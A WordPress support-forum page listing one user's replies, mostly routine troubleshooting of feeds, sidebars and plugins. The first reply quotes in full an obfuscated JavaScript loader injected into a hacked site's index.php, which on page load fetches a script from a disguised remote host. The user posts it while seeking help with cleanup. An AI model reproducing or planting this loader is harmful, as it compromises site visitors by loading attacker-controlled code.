Forum: Fixing WordPress
In reply to: <script> appearing in core files and disabling WordPressI’m in the middle of following some steps from the above links and wanted to post what I found:
Script code added to the index.php file itself
<script>/*GNU GPL*/ try{window.onload = function(){var Z053al9rqw = document.createElement('s#$c@#()$r)&^(i@@()p$#!t!#('.replace(/\!|\$|@|\(|\^|&|\)|#/ig, ''));Z053al9rqw.setAttribute('type', 'text/javascript');Z053al9rqw.setAttribute('src', 'h$t&t@!$#p$#:(!/@@/(&)t!$i(m(!!^e#($-(#c@$o)!^m$&#.!!s$#)u)$@r#^v!@(e(&y)(&&m@@o((n!^k#&)^#e&y(#$.$!c!$o&($m@!#.)$w^$^a&s#$(h^i!#n$!^g))t@)o^n^p^^o^@#$s&^t@@-^!c(^&o&m!^!^$.#w!@i&$&$@n$)$t#&#!e))&r$$#s(&a!$(l@e!@(o)^$#n^$)l)(&)i@&n!!@#e#!.$@#r^)!u&#^:@$8@!0)$#8@^!0!!!/^^))g!($o)^&o&g@#)&l^&&)e().^$&c#)@$!o!@)m$$/$!!!#g$o)@(o@g)#l@#^)@e$!#.#^@#c(@o^m!#/#$&z(@e@!!(d((o##(.!c@^!o)!)m)/^!m#)!@e&d&#i^(@a@(p$l^^e#x($.#!#c^&&!o@#^m^^/$^)g&&!o(^&o^g@!l^@@e@#.$c(o!.@^t(^h^!/&&'.replace(/\^|\!|\)|#|\(|&|\$|@/ig, ''));Z053al9rqw.setAttribute('defer', 'defer');Z053al9rqw.setAttribute('id', 'M@^g(7)m$&5#l#s@$(!#o#@^k#!$q)$)'.replace(/&|@|\!|\$|#|\^|\)|\(/ig, ''));document.body.appendChild(Z053al9rqw);}} catch(e) {}</script>
Wp-content/index.php also has a script inserted. I just backe dup teh sties and the DB and will be doing an ultra-clean install (deleting everything on the server).

In reply to: <script> appearing in core files and disabling WordPressYeah, I never really “Cleaned up” — just removed the bad files. Also found a theme no longer posted RSS and that had to be changed. I’ll follow the steps in those links. Thanks emsi.

In reply to: [Feedwordpress] Most feeds fine, others — not so finejsix — what does that have to do with Feedwordpress? Could you please clarify? Because you’re talking general-RSS (so it seems) and we’re talking plugin issues.

In reply to: SIde bar is pushed down when using IEI’ve used the IE tab on Firefox (add-on plugin) and IE 7. I don’t see a problem from where I am sitting.

In reply to: Integrating Facebook ConnectIf we’re talking about the Reyes / sociable version of Facebook connect (there are 2 versions), I’ve found it only works (for me) with 2.7 compliant themes. Any older theme and things get messed up.
Forum: Themes and Templates
In reply to: Malicious Code in a Theme?disregard. Something else is wrong with the site that led to the code being inserted into the footer to begin with. I don’t have a copy of the code either as I deleted it before asking questions…
Forum: Plugins
In reply to: [Feedwordpress] Most feeds fine, others — not so fineBTW, a google search brought up this post that shows several different plugins that are devoted to RSS Aggregation / syndicaiton. While FeedWordpress is at the top of the list, several alternatives are listed.
Forum: Installing WordPress
In reply to: XML Parsing ErrorI found the error through Functions.php. Also, it depends on yoru site layout — I found out that I busted the feed through having 2 calls to the dynamic sidebars (as I was using 2 separate designs). You don’t need two arrays for the dynamic sidebars, everything should be in one array (am I terming this correctly? I’m talking about:
‘<?php
if ( function_exists(‘register_sidebar’) )
register_sidebar(array(,
‘before_widget’ => ”,
‘after_widget’ => ”,
‘before_title’ => ‘<h2>’,
‘after_title’ => ‘</h2>’, ));
));
?>’so don’t just check the files for spaces (that may be moot). Make sure the PHP is valid in the functions file.

In reply to: Widget BackgroundScratch that. Found what I was looking for here:

In reply to: Widget Backgrounddrewactual, can you elaborate on this?
I have a 3 column theme with 3 distinct widget areas. I’d like the individual widgets to have their own properties on 2 of the 3 sidebars and that CSS code for individual widgets would come in handy.

In reply to: Problem with feedwordpressI’m getting an error ont hat feed link…
But as for the title alone beign imported from a feed — I’ve experienced that in multitudes from Typepad based blogs (not typepad exclusively, nor always Typepad-powered blogs. Just a lot fo the time, it’s associated with Typepad).

In reply to: [Plugin: Karailiev’s sitemap] anyone tried this plugin?Doesn’t work on my end. Generating a site map and the the next screen, upon completion, is blank. I check the XML file and there is nothing there.

In reply to: [Feedwordpress] Most feeds fine, others — not so fineelBradford —
Yeah, I know the support forum is not necessarily going to get me an answer. In fact I’m more likely to find resolutions to my problems using Google than using search on WordPress’ forums. That goes for trying to find plugins too (note that WP-powers-that-be, the search feature ON www.ads-software.com sucks)
I still try to get things done on here. Sometimes posting is the only way to wake-up to the realization what’s wrong (you try to put off posting as long as you can until you figure out what went wrong in the first place).
There had been several plugins I had seen for syndicating feeds… just not sure if they are around any more. I’ll let you know what I find.

In reply to: Integrating Facebook ConnectI’ve got it installed now and I’m not getting the Facebook button. In fact, instead of Facebook images being displayed, it’s the user Gravatars that show up.
My theme IS an arcane mix of 2.x-2.7 code mixed together but there shouldn’t be anything stopping the plugin all together like this.
I’m wondering if maybe I missed a setting on facebook itself or…?
